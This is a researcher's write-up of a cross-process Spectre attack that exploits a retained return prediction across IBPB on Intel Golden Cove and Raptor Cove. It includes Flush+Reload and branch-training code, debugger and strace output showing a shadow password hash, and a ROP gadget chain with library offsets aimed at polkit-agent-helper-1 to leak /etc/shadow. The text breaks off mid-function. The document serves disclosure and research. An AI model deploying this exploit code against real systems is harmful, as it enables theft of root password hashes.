Cross-Process Spectre Exploitation
By Johannes Wikner
October 18, 2024
I will walk through a cross-process Spectre attack I developed, partly while interning at Open Source Security, Inc.
Cross-Process Spectre
I have developed an exploit to demonstrate the impact of an incomplete Indirect Branch Prediction Barrier (IBPB) that I discovered in Intel Golden Cove and Raptor Cove. IBPB is meant to invalidate all indirect branch target predictions, which includes returns and jump/call instructions that take a memory or register operand (i.e., indirect branches). However, due to buggy microcode -- which appears to be an emergent problem in modern processors -- certain return target predictions are retained across IBPBs.
Back at ETH, Kaveh and I wrote a paper on this matter that we're publishing today along with this write-up. In the paper we also exploited a semantics issue of IBPB on certain AMD parts, leading to privileged memory disclosure on systems using IBPB-on-entry, which ironically is meant to be the more comprehensive mitigation alternative to the suspicious-looking, software-based SafeRET and retbleed thunk mitigations. In this write-up I will focus on the cross-process exploit, which is special for a couple of reasons.
- AFAIK, this is the first end-to-end cross-process Spectre exploit that does not attack an artificial toy program.
- The overwhelming majority of software authors are unconcerned about cross-process Spectre attacks, as indicated by the fact that virtually none of them enable IBPB. The only exception I've seen is Google Chrome.
Unlike OS kernels, which are packed with thousands of lines of code to select the appropriate mitigations to fend off cross-privilege Spectre attacks, user programs do nothing --- even if they run as root and manage sensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope to convince the authors of such programs to use IBPB. However, even if they had used IBPB, they would still have been vulnerable to the attack I'll explain. Intel has patched the IBPB issue in a microcode update released earlier this year, so now they would be safe.
What IBPB?
Branch prediction state is shared across processes running on the same core. While predictions may be restricted to the sibling thread and privilege domain they belong to, programs running in the same thread and privilege domain can influence each other's speculative control flow. To prevent this, IBPB should be used. IBPB is triggered from the privileged domain with a Model-Specific Register (MSR) write:
movq $0x49, %rcx ; MSR_IA32_PRED_CMD
movq $1, %rax ; PRED_CMD_IBPB
xor %rdx, %rdx
wrmsr
User programs can enable this via the prctl() ABI, as sketched below. Besides user programs, hypervisors like KVM will unconditionally use IBPB when switching vCPUs. It is also likely -- however I didn't test it, and it is not explicitly documented -- that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.
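For example, a user program that wants this protection could issue the following call at startup (a minimal sketch, assuming a kernel with speculation-control support; it is the same call used later in this write-up to trigger IBPB):
#include <sys/prctl.h>
#include <err.h>
int main(void) {
    /* Ask the kernel to keep this task's indirect branch predictions away
     * from other tasks; the kernel issues IBPB on context switch. */
    if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
              PR_SPEC_FORCE_DISABLE, 0, 0))
        err(1, "prctl");
    /* ... handle secrets ... */
    return 0;
}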
Before delving deeper, we'll cover some additional background on Spectre attacks.
How Spectre mis-speculations are exploited
Most of us are aware of at least some of the various Spectre vulnerabilities that modern processors are susceptible to. In a Spectre attack, the goal of the attacker is to leak unauthorized data by combining transient execution of incorrect control flow, caused by a branch misprediction, with side-channel analysis.
Branch misprediction
Branch prediction concerns conditional branch directions (e.g., taken vs. fall-through) and branch target addresses, stored in microarchitectural, core-local, table-like data structures. Our focus is on branch target address predictions. Intel processors are known to store these in Branch Target Buffers (BTBs) and TAGE-table-like structures. We do not need to understand exactly how these work. However, for a mental picture, I show an illustration of my own view below. I copied details about Intel's TAGE configuration from the recent Indirector paper. (I am not claiming that this resembles any actual implementation, but it works for the purpose of this write-up.)
IP[23:0]----------+
|
+----------v--------------+
| BTB |
|-------------------------|
Set 0 | Entry0 | ... | Entry 11 | +---------------------------------------------+
Set 1 | Entry0 | ... | Entry 11-+----->| BTB entry |
Set .. | | |---------------------------------------------|
Set 1K | Entry0 | ... | Entry 11 | | 8bit | 1bit | 2bit | 2bit | 1bit | 32bit |
+-------------------------+ | TAG | THREAD | PL | TYPE | OF | TARGET |
+--------------------------|------------------+
+-----------------+--------------------+----------------+
| | | |
"RETURN" ,--> "INDIRECT" ,-----> "DIRECT" <-, "CONDITIONAL"
| | | no-path-correl. | | |
+-----+ "RSBA" v | v Taken v
| RSB |-----' "TAGE"------' TARGET '------ PHT
+-----+ VVVV
IP[15:6]---------+-----------------------+----------------------+
| | |
BHB[67:0] BHB[131:0] BHB[387:0]
| | |
+--------v--------+ +--------v--------+ +-------v---------+
| TAGE1 | | TAGE2 | | TAGE3 |
|-----------------| |-----------------| |-----------------|
Set 0 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
Set 1 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
Set .. | .... | | .... | | .... |
Set 511 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
+----|------------+ +-----------------+ +-----------------+
| ^
| 194 branches hist----'
|
+----------v------------+
| TAGE entry |
|-----------------------|
| 10bit | 48bit | 2bit |
| TAG | TARGET | PL |
+-----------------------+
The BTB is a set-associative buffer that is indexed by the current Instruction Pointer (IP), where each BTB entry contains a static target and a type. If the type is INDIRECT, the (indirect) branch target prediction is in fact dynamic and depends on the path history. If the type is RETURN, we should receive the branch target from the Return Stack Buffer (RSB), which records the upcoming return address for every encountered call instruction. Storing branch type information within the BTB allows the processor to prepare a prediction ahead of time, before instruction decode of its branch source has completed, which can lead to Phantom speculation, which SRSO exploits.
For indirect branch target prediction, the BTB acts as the 0th-level "tagless" TAGE table, used when there is no correlation between path history and the branch. Otherwise, we also consider the branch targets from higher-level TAGE tables, picking the target that correlates with the longest path history. Intel refers to this path history as a Branch History Buffer (BHB). If the current BHB does not correlate with a prediction in the TAGE tables, we fall back to the static target of the BTB.
For return target prediction, the BTB and TAGE entries may also become relevant should the RSB not reference a valid target, for example because the RSB is empty. If so, Intel's "bottom-less" RSB instead uses an alternate prediction scheme (RSBA), which essentially means treating the BTB entry of the return as if it had type INDIRECT. For this to work, every time a return is executed, it not only updates the RSB state but also updates the indirect branch predictor with return targets.
Additional information needs to be stored as well: the privilege level PL, the hardware thread THREAD, and an overflow bit OF that indicates whether a direct branch target crosses a 4 GiB boundary. I also imagine that information about whether the branch is a CALL might be recorded for faster RSB updates.
Side-channel analysis
What we most commonly see in Spectre attacks is that the attacker forces the victim to make a misprediction, transiently access unauthorized memory ("secrets"), and use it in subsequent secret-dependent operations. The attacker can then deduce the secret via a Flush+Reload (F+R) side channel. F+R is a comparably fast and low-noise side channel, but it relies on memory sharing between the attacker and the victim. That is usually not a concern, however: all user memory is shared with the kernel via the physmap, and the non-writable sections of shared libraries are shared across all processes using the library (so you don't need to keep 1000 copies of glibc in memory for every running program ;))
Flush+Reload
Here is an F+R example. We introduce a "reloadbuffer" RB that contains a number of "entries" that will be flushed and reloaded while measuring their access times, revealing whether the memory was fetched after it was flushed. Each entry has a corresponding bin in a histogram RB_HIST. When reloading, if there is a cache hit for a particular entry (deduced by its access time), the respective bin increments.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <err.h>
/* it's generally better to hardcode hit/miss threshold than to compute it:
* 1. threshold becomes an immediate
* 2. calibrating requires a warmup to get stable value => slow.
* The following should detect LLC misses on all microarchs. */
#ifndef CACHE_MISS_THRES
#define CACHE_MISS_THRES 150
#endif
#ifndef RB_PTR
/* The Reload Buffer "RB" gets a hardcoded address so that it is unlikely
* to neighbor other data */
#define RB_PTR 0x13200000UL
#endif
#ifndef RB_STRIDE
/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller
* strides are possible, but increases the chance of data cache prefetching =>
* noisy results.
*/
#define RB_STRIDE (1UL<<12)
#endif
#ifndef RB_SLOTS
/* If we're just testing if a side channel works, we are fine with just a few
* entries. To leak full bytes we would need 256 entries. */
#define RB_SLOTS 8
#endif
#ifndef SECRET
/* If we're just testing if a side channel works, we can aim at leaking a
* pre-determined "secret" value. */
#define SECRET 6
#endif
#ifndef RB_OFFSET
/* Rather than reloading a page-aligned address, we can pick something else.
* The first few CLs of a page are more likely prefetched than others. */
#define RB_OFFSET 0x180
#endif
#ifndef RB_HIST
/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed
* address too to make the reloading code position independent. */
#define RB_HIST 0x1800000
#endif
#ifndef mb
/* Wait for all memory operations to complete before continuing. */
#define mb() asm("mfence" ::: "memory");
#endif
typedef unsigned long u64;
typedef unsigned int u32;
typedef unsigned char u8;
/* Start measure */
static __always_inline u64 rdtsc(void) {
unsigned lo, hi;
asm volatile ("lfence\n\t"
"rdtsc\n\t"
: "=d" (hi), "=a" (lo));
return ((u64)hi << 32) | lo;
}
/* Stop measure */
static __always_inline u64 rdtscp(void) {
unsigned lo, hi;
asm volatile("rdtscp\n\t"
"lfence\n\t" : "=d" (hi), "=a" (lo)
:: "ecx");
return ((u64)hi << 32) | lo;
}
/**
* Reload the n cache lines used for flush+reload. If access time is below the
* threshold, increment the respective counter for the histogram/results.
*/
static __always_inline void reload_range(long base, long stride, int n, u64 *results) {
mb();
/* unroll the loop to avoid triggering data cache prefetcher. */
#pragma clang loop unroll(full)
for (u64 k = 0; k < n; ++k) {
/* semi-randomize the reload-order to avoid triggering data cache prefetcher */
u64 c = (k*7+5)&(n-1);
unsigned volatile char *p = (u8 *)base + (stride * c);
u64 t0 = rdtsc();
*(volatile unsigned char *)p;
u64 dt = rdtscp() - t0;
if (dt < CACHE_MISS_THRES) results[c]++;
}
}
/**
* Flush all the cachelines used for flush+reload.
*/
static __always_inline void flush_range(long start, long stride, int n) {
mb();
for (u64 k = 0; k < n; ++k) {
volatile void *p = (u8 *)start + k * stride;
asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));
}
}
static u8* rb = (u8 *)RB_PTR;
static u64 *rb_hist = (u64 *)RB_HIST;
#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)
/* Prefer huge pages for the reloadbuffer => less noise. */
#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)
#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)
/**
* Convenience macros.
*/
#define rb_reset() memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))
#define rb_flush() flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);
#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);
/**
* Initialize flush+reload buffer referenced by (RB_PTR) and the results
* (RB_HIST).
*/
static void rb_init() {
/* Histogram, or simply put, the results. */
if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE, MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {
err(1, "rb_hist");
}
if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
err(1, "rb");
}
/* Try to make this page a single 2MB page, to avoid TLB missing when
* reloading. */
madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);
memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed*/
}
#define ROUNDS 1000
int main(void) {
rb_init();
rb_flush();
rb_reset();
for (int i = 0; i < ROUNDS; ++i) {
rb_flush();
mb();
// touch something.
*(u8*) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;
mb();
// we will be able to deduce what entry was touched.
rb_reload();
}
// print each bin.
for (int i = 0; i < RB_SLOTS; ++i) {
printf("%04ld ", rb_hist[i]);
}
printf("\n");
return 0;
}
The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.
clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0000 0000 1000 0000
clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0999 0000 0000 0000
See how the results turn noisier if we, for example, reduce the stride and increase the number of entries (n.b., RB_SLOTS must remain a power of 2).
clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000
Comparing the signal of the expected-hot entry with the other entries lets us infer how noisy the measurement is, and it lets us detect bugs. For example, if we forget to enable optimizations, we immediately see that something is not right.
clang ./ex1.c -o ex1 && ./ex1
# > 0999 1000 0996 0999 0125 0000 1000 0000
We will use F+R to observe indirect branch target misprediction.
Observe indirect branch misprediction
There is a key difference between path-history-based and IP-based indirect branch target prediction: the IP-based prediction uses the BTB, which holds only the lower 32 bits of the target. We can observe this with a simple F+R experiment.
Consider the following four snippets.
/* training branch source */
mk_snip(tr_src,
"mov $" STR(RB_PTR) ", %rax;"
"clflush (%rdi);"
"mfence ;"
#ifdef USE_RET
"push (%rdi) ;"
"ret ;"
#else
"jmp *(%rdi) ;"
#endif
);
/* victim branch source */
mk_snip(vi_src,
"mov $" STR(RB_PTR) ", %rax;"
"clflush (%rdi);"
"mfence ;"
#ifdef USE_RET
"push (%rdi) ;"
"ret ;"
#else
"jmp *(%rdi) ;"
#endif
);
/* This one will never execute */
mk_snip(tr_dst_IP,
/* signals "2", assumes RB_PTR in rax */
"mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"
"lfence;"
"ret;"
);
mk_snip(tr_dst_BHB,
/* signals "4", assumes RB_PTR in rax */
"mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"
"lfence;"
"ret;"
);
We assign these snippets the following code pointers.
init_snip(&tr_src_desc, 0x10000000000, tr_src);
/* v- bit 24 */
init_snip(&vi_src_desc, 0x01001000000, vi_src);
/* v-- bit 32 */
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */
init_snip(&tr_dst_IP_desc, 0x01020000000, tr_dst_IP); /* Near the vi_src */
Golden Cove and Raptor Cove use only the lower 24 bits of the IP to address the BTB. Hence, tr_src and vi_src resolve to the same BTB set and tag (i.e., they alias). After we execute tr_src with a pointer to tr_dst_BHB in rdi, a new prediction is created. The BTB, however, only contains the lower 32 bits of the target, while the full target is stored in the TAGE tables. So the question is: after training tr_src with tr_dst_BHB as the target, will tr_dst_BHB or tr_dst_IP be predicted when we execute vi_src?
Assuming the path history leading up to vi_src was different, it might predict tr_dst_IP once. However, the next time, it will recognize the mistake and avoid repeating it. To make it consistently mispredict tr_dst_IP or tr_dst_BHB, we need to introduce path history.
#define OP_RET 0xc3
#define BHB_AREA 0x4400000000L
static void init_bhb_area() {
if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
err(1, "bhb_area");
}
}
static void random_bhb(u64 *bhb, int n) {
for (int i = 0; i < n; ++i) {
// some random sequence of return branches in the BHB_AREA
bhb[i] = BHB_AREA + (random()%(1L<<24));
*(u8 *) bhb[i] = OP_RET;
}
}
#define BHB_LEN 195
static u64 bhb[BHB_LEN];
static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;
int main(void) {
init_bhb_area();
srandom(getpid());
random_bhb(bhb, BHB_LEN);
init_snip(&tr_src_desc, 0x10000000000, tr_src);
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);
init_snip(&vi_src_desc, 0x01001000000, vi_src);
init_snip(&tr_dst_IP_desc, 0x01020000000, tr_dst_IP);
#define ROUNDS 1000
for (int i = 0; i < ROUNDS; ++i) {
/* train */
asm(
"lea 33f(%%rip), %%rax ;" /* return address after training */
"push %%rax ;"
"push %1 ;" /* training source */
"mov %0, %%rbx ;" /* add the branch history*/
".rept " STR(BHB_LEN) ";"
" push (%%rbx) ;"
" add $8, %%rbx ;"
".endr ;"
"ret ;" /* go through BHB, then branch source */
"33: ;"
:: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr) : "rax", "rbx");
rb_flush();
/* DO STUFF HERE */
/* run victim */
asm(
"lea 33f(%%rip), %%rax ;"
"push %%rax ;"
"mov %%rsp, %%rdi ;" /* vi_src will take us right back to "33:" */
"push %1 ;"
"mov %0, %%rbx ;"
".rept " STR(BHB_LEN) ";"
" push (%%rbx) ;"
" add $8, %%rbx ;"
".endr ;"
"ret ;"
"33: ;"
"add $8, %%rsp ;" /* re-adjust stack */
:: "r"(bhb), "r"(vi_src_desc.ptr): "rdi", "rax", "rbx");
rb_reload();
}
rb_print();
return 0;
}
If we run this, we get:
0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb
Unsurprisingly, thanks to the matching path history leading up to vi_src and tr_src, vi_src mispredicts tr_dst_BHB. If we instead randomize the BHB before we run vi_src, for example by inserting random_bhb(bhb, BHB_LEN); before /* run victim */, we get instead:
0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb
In fact, because all TAGE table addressing depends on the most recent path history, randomizing only the last branch in the BHB yields the same result as the above.
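For instance, a minimal sketch reusing random_bhb's conventions (rerandomizing just the final history entry before running the victim):
/* rerandomize only the most recent branch of the path-history, and plant
 * a ret there so the new address remains a valid branch source */
bhb[BHB_LEN - 1] = BHB_AREA + (random() % (1L << 24));
*(u8 *)bhb[BHB_LEN - 1] = OP_RET;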
So the misprediction now took tr_dst_IP -- which is funny, because we never executed that code in the program. We can now do the same thing with USE_RET defined, to use returns, and we get:
0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb
0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb
So we get the same result, but with a bit weaker signal. Many of you might find it strange to see what appears to be indirect branch target predictions on top of returns. However, this is an Intel feature that has many names, such as "bottom-less RSB", "RSBA", "RRSBA". Return Stack Buffer Alternate (RSBA) occurs when the RSB is empty. Because of our long path-history, consisting only of returns, the RSB is guaranteed empty when we hit the victim branch, hence we get RSBA. To be precise, on eIBRS systems, we call it Restricted RSBA (RRSBA) since the alternate predictions (not the RSB predictions) are protected by eIBRS (they are indirect branch predictions after all).
Bring in IBPB
We want to check whether IBPB handles these predictions. There's a super easy way (thanks to bsdaemon ;)) to trigger IBPB in Linux 6.2+: we can just do
prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);
I was on an Ubuntu 5.15.0-97-generic kernel while doing this work, so I did the same using a kernel module instead; a minimal sketch of that approach follows.
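This sketch assumes an x86 kernel tree; the MSR constants and wrmsrl() come from the kernel's MSR headers. The real experiment wants the barrier issued on the pinned CPU between training and victim run (e.g., behind an ioctl), but this shows the gist:
#include <linux/module.h>
#include <linux/init.h>
#include <asm/msr.h>
#include <asm/msr-index.h>
static int __init ibpb_init(void)
{
    /* same write as the asm snippet earlier: PRED_CMD.IBPB = 1 */
    wrmsrl(MSR_IA32_PRED_CMD, PRED_CMD_IBPB);
    return 0;
}
static void __exit ibpb_exit(void) { }
module_init(ibpb_init);
module_exit(ibpb_exit);
MODULE_LICENSE("GPL");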
Now, if we apply an IBPB after training and test vi_src for (1) path-based and (2) IP-based predictions, for (a) an indirect branch and (b) a return, we expect all predictions to be invalidated and therefore all signal to be gone. Instead, however, we get something unexpected.
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret, (1,b)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)
0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret, (2,b)
We are still getting signal from tr_dst_IP, post-IBPB! It took a while to conclude that this was not a software bug. In fact, this is a microcode bug! The prediction is retained across the IBPB. But what should we do with this interesting effect?
Build a cross-process Spectre leak
Two things that IBPB is used for are context switches and vCPU switches. While it would be cool (and certainly not impossible) to leak information from a co-tenant VM with this primitive, it appears easier to prove the impact of the vulnerability by targeting context switches between processes.
The funny thing, however, is that nobody appears to have built a real cross-process Spectre attack in the past. So in order to prove that IBPB bugs are a real problem, we must first build a cross-process Spectre exploit -- one that IBPB should protect against.
Another funny thing is that the only victim candidate I found that was using IBPB was Google Chrome. But we are already deep down in a mess, and descending deeper, into javascript hell, would not do my sanity well.
Instead we will target a SUID program that lets you authenticate as root via
a password prompt. After a bit of poking around, I decided that polkit appeared
to be a perfect victim, specifically the /usr/libexec/polkit-agent-helper-1
that is present on most Linux machines.
polkit-agent-helper-1 is not meant to be run by humans, but reading its source code shows that it takes two arguments: the user to authenticate as (we will use root, of course) and a "cookie", which we don't really care about. Secondly, stdin must be anything but a tty for it to work. So we can run it like:
while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > PAM_PROMPT_ECHO_OFF Password:
Since the attacker can obtain the same binaries and libraries as the victim (e.g., via apt repos), they can debug this program with full privileges locally. So we run strace on it:
while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669
# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3
# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651
# > PAM_PROMPT_ECHO_OFF Password:
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, ^Cstrace: Process 334359 detached
# > <detached ...>
This is fantastic and weird at the same time! It reads the password hashes from /etc/shadow before even taking the password. It appears that libpam, which manages the authentication, does this to check that the password is valid and hasn't expired. It also stores the password hash in memory inside the pam context.
We want to hijack a return in this process by first training it in our attacker process, then triggering the victim to run by sending a character to its stdin. To figure out which returns are exploitable, we can use Intel PT (via perf) to create a --call-ret trace.
I recorded the function graph from my process over the context switch to the polkit helper, which is `read`-ing my process' characters via an `fgets` call in its pam conversation.
There are three returns in the victim, all in glibc, that could be exploited if predicted with RRSBA: read, _IO_file_underflow, and _IO_default_uflow. Unfortunately, they are not predicted with RRSBA, because the call depth imposed by read in the victim is too shallow. However, the victim accepts any kind of stdin, except a tty. So instead of attaching a normal pipe to interact with the victim's stdin, we can attach a socket, as sketched below. Because sockets are much more complicated to read from, the read call depth of the victim now exceeds the RSB capacity, leading to exploitable RRSBA-predicted returns at all three sites.
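A sketch of attaching a socket instead of a pipe (spawn_with_socket_stdin is a hypothetical helper name; the exploit's actual process plumbing differs):
#include <sys/socket.h>
#include <unistd.h>
/* Spawn the victim with one end of a unix socketpair as its stdin;
 * the parent keeps the other end to feed it password bytes. */
static int spawn_with_socket_stdin(char *const argv[]) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;
    if (fork() == 0) {
        dup2(sv[1], 0);   /* a socket, not a tty or pipe, becomes stdin */
        close(sv[0]);
        close(sv[1]);
        execv(argv[0], argv);
        _exit(127);
    }
    close(sv[1]);
    return sv[0];          /* write victim input here */
}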
We take a look at _IO_default_uflow in gdb, and what we find is surprising!
Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366
366 ./libio/genops.c: No such file or directory.
0x00007ffff7c46daf <__GI__IO_default_uflow+79>: 5d pop %rbp
=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>: c3 ret
0x00007ffff7c46db1 <__GI__IO_default_uflow+81>: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
(gdb) i r
rax 0x41 65
rbx 0x0 0
rcx 0x7ffff7ccd7e2 140737350784994
rdx 0x555555596301 93824992502529
rsi 0x555555596300 93824992502528
rdi 0x0 0
rbp 0xa 0xa
rsp 0x7fffffffe148 0x7fffffffe148
r8 0x0 0
r9 0x555555596300 93824992502528
r10 0x7ffff7dd4270 140737351860848
r11 0x246 582
r12 0x7ffff7dd3aa0 140737351858848
r13 0x0 0
r14 0x7fffffffe1f0 140737488347632
r15 0x1ff 511
rip 0x7ffff7c46db0 0x7ffff7c46db0 <__GI__IO_default_uflow+80>
eflags 0x202 [ IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/s $rsi
0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...
As we're reading entered characters from the password prompt, the stream buffer that stdin receives password input into (here 'A') already contains the secret that we want to leak, and it's referenced by three different registers! Even better, the last entered character sits in rax, which can act as an index to target a specific byte of the secret. How did that happen?
Because the password hashes were read right before presenting the password prompt, the most recently freed memory was the stream buffer of the file handle for /etc/shadow. When we immediately allocate a new stream buffer for stdin, which is of the same size as the previous one, malloc recycles that memory. So the memory that rsi, rdx, and r9 reference is in fact simply uninitialized memory that happened to hold secrets just before.
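The recycling effect is easy to reproduce in isolation. A minimal sketch, assuming glibc's malloc (free-list metadata may clobber the first bytes of the recycled chunk):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
    /* stand-in for the /etc/shadow stream buffer */
    char *shadow_buf = malloc(4096);
    strcpy(shadow_buf, "root:$6$...:19755:0:99999:7:::");
    free(shadow_buf);            /* freed, but never cleared */
    /* same-sized allocation => malloc hands the chunk right back */
    char *stdin_buf = malloc(4096);
    stdin_buf[0] = 'A';          /* one typed character, as in the victim */
    /* the tail of the stale "hash" is still there */
    printf("%.30s\n", stdin_buf + 16);
    return 0;
}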
But how should we leak the secret?
Gadget chain
We know that we can hijack a return and make it speculatively execute a target of our choice in the victim's address space. The speculated target needs to read a byte of the secret using rax as index. Then we need to transmit it to the attacker over an F+R side channel. Because read-only sections of shared libraries are shared in physical memory, the idea is to use the executable section of glibc, referenced by rcx and rip, as the "reloadbuffer". So we want to make a secret-dependent memory access relative to rcx or rip, so that we can later deduce the secret in the attacker's process.
I realized that it is not going to be easy to find code in the victim's address space (marked "present", as we can't manage #PFs under speculation) that loads part of the secret from memory and transmits it (via F+R) in one single gadget. However, maybe it is possible to stitch together a chain of gadgets, each doing one of the necessary operations, and trigger a series of nested return mispredictions to speculatively execute all of them. At this point, I was mildly exhausted, so I reached out to the very encouraging and enthusiastic security folks at Google. They told me that they would be happy to find me a ROP-gadget chain -- they are a search company after all! Indeed, a few days later Chani Jindal sent me a perfect-looking gadget chain:
0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)
0x7ffff7cef5b7: rol eax, 0x08 ; ret ; (/usr/lib/x86_64-linux-gnu/libc.so.6)
0x7ffff75f45ec: shl rax, 0x02 ; ret ; (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)
0x7ffff73af74b: mov al, byte [rcx+rax] ; ret ; (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)
The first gadget reads a byte of the secret using the attacker-controllable rax as index, with zero-extension so that the rest of rax gets zapped. The secret byte then gets rotated left by 8 bits, shifted left by another 2, and finally used as an index in a memory load relative to rcx.
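To make the arithmetic concrete, here is my reconstruction of the address the chain touches for a secret byte s:
typedef unsigned long u64;
/* sketch: effective address probed by the gadget chain for secret byte s */
u64 probe_addr(u64 rcx, unsigned char s) {
    u64 eax = s;          /* movzx eax, byte [rax+rdx]: upper bits zapped */
    eax <<= 8;            /* rol eax, 0x08: with the high bits zero, a plain shift */
    u64 rax = eax << 2;   /* shl rax, 0x02: rax = s * 1024 */
    return rcx + rax;     /* mov al, byte [rcx+rax] fetches this line */
}
So successive byte values land on cache lines 1024 bytes apart inside glibc's executable section, which is what the attacker later flushes and reloads (once the shl gadget is dropped, as happens below, the spacing shrinks to 256 bytes).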
Exploit!
The procedure works as follows.
The attacker forks a new process, pins it and itself to the same hardware thread (sketched below), and spawns the victim program. Sharing a hardware thread lets the attacker and victim share branch prediction and cache state.
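Pinning can be done with the ordinary affinity API (a sketch, assuming glibc's sched_setaffinity):
#define _GNU_SOURCE
#include <sched.h>
/* pin the calling task to one hardware thread; attacker and victim must
 * land on the same one to share predictors and caches */
static int pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}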
The attacker attaches a socket to the stdin of the victim and waits for the password prompt.
To train the gadget chain in the victim, we construct and execute a ROP chain, made up of NOPs (0x90) and RETs (0xc3), at aliasing addresses.
#define LIBC_AX 0x7ffff7be0000
#define LIBICUUC_AX 0x7ffff68eb000
#define LIBZSTD_AX 0x7ffff75ee000
#define LIBPCRE2_8_AX 0x7ffff73ad000
#define GADGET(start, size) \
{ \
start, start + (size - 1) \
}
static struct bhb_bb bhb_path_b[] = {
// __GI__IO_default_uflow
GADGET(LIBC_AX + 0x065d96, 27), //
// movzbl (%rax,%rdx,1),%eax ; ret \x0F\xB6\x04\x10\xC3
GADGET(LIBICUUC_AX + 0x005a69, 5),
// rol $8, %eax; ret \xC1\xC0\x08\xc3
GADGET(LIBC_AX + 0x10e5b7, 4),
// shl $2, %rax ; ret \x48\xC1\xE0\x02\xc3
GADGET(LIBZSTD_AX + 0x45ec, 5),
// mov (%rcx,%rax,1), %al ; ret \x8A\x04\x01\xC3
GADGET(LIBPCRE2_8_AX + 0x74b, 4)
};
#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))
void init_gadgetchain(long off)
{
for (int i = 0; i < BHB_B_LEN; ++i) {
struct bhb_bb *bb = &bhb_path_b[i];
memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));
memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);
}
}
void train_gadgetchain(u64 off)
{
static long bbstack[6];
